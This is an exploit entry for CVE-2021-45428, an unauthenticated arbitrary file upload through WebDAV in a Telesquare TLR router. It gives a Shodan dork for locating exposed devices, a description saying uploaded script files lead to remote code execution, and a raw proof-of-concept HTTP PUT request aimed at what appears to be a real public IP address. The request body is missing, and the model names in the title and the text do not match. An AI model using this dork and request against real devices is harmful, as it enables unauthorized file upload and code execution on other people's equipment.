# Exploit Title: TLR-2005KSH - Arbitrary File Upload# Date: 2022-05-11# Shodan Dork: title:"Login to TLR-2021"# Exploit Author: Ahmed Alroky# Author Company : Aiactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# Tested on: Windows# CVE: CVE-2021-45428# Vulnerability Description# Due to the Via WebDAV (Web Distributed Authoring and Versioning),# on the remote server,telesquare TLR-2021 allows unauthorized users to upload# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes# remote code execution as well.# Due to the WebDAV, it is possible to upload the arbitrary# file utilizing the PUT method.# Proof-of-Concept# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host:223.62.114.233:8081<http://223.62.114.233:8081/>
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length:10
